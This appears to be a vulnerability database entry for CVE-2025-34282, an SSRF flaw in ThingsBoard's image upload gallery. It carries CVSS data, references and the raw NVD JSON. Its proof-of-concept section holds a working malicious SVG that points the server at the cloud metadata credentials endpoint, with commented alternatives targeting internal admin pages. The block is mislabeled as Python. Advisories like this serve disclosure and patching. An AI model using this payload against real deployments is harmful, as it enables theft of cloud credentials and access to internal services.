CVE-2025-34282

Description

ThingsBoard versions < 4.2.1 contain a server-side request forgery (SSRF) vulnerability in the dashboard's Image Upload Gallery feature. An attacker can upload a malicious SVG file that references a remote URL. If the server processes the SVG file in a way that parses external references, it may initiate unintended outbound requests. This can be used to access internal services or resources.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:thingsboard:thingsboard:*:*:*:*:*:*:*:* - VULNERABLE

ThingsBoard < 4.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?xml version="1.0" encoding="UTF-8"?>
<!-- Malicious SVG file for SSRF exploitation (CVE-2025-34282) -->
<!-- This SVG references an internal service or cloud metadata endpoint -->
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500">
  <image xlink:href="http://169.254.169.254/latest/meta-data/iam/security-credentials/" width="500" height="500" />
  <!-- Alternative: target internal services -->
  <!-- <image xlink:href="http://localhost:8080/api/admin/settings" width="500" height="500" /> -->
  <!-- Alternative: target internal network services -->
  <!-- <image xlink:href="http://192.168.1.1/admin" width="500" height="500" /> -->
  <text x="10" y="30" font-size="14" fill="black">SSRF PoC - CVE-2025-34282</text>
</svg>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34282
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34282
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34282/
[4] VulDB https://vuldb.com/cve/CVE-2025-34282
[5] https://github.com/thingsboard/thingsboard/pull/13927
[6] https://github.com/thingsboard/thingsboard/releases/tag/v4.2.1
[7] https://www.vulncheck.com/advisories/thingsboard-svg-image-ssrf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34282", "sourceIdentifier": "[email protected]", "published": "2025-10-17T19:15:37.340", "lastModified": "2025-10-24T13:43:12.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ThingsBoard versions < 4.2.1 contain a server-side request forgery (SSRF) vulnerability in the dashboard's Image Upload Gallery feature. An attacker can upload a malicious SVG file that references a remote URL. If the server processes the SVG file in a way that parses external references, it may initiate unintended outbound requests. This can be used to access internal services or resources."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thingsboard:thingsboard:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.1", "matchCriteriaId": "DCE4C513-C695-4227-B5E7-BBD2EC014DF8"}]}]}], "references": [{"url": "https://github.com/thingsboard/thingsboard/pull/13927", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/thingsboard/thingsboard/releases/tag/v4.2.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/thingsboard-svg-image-ssrf", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}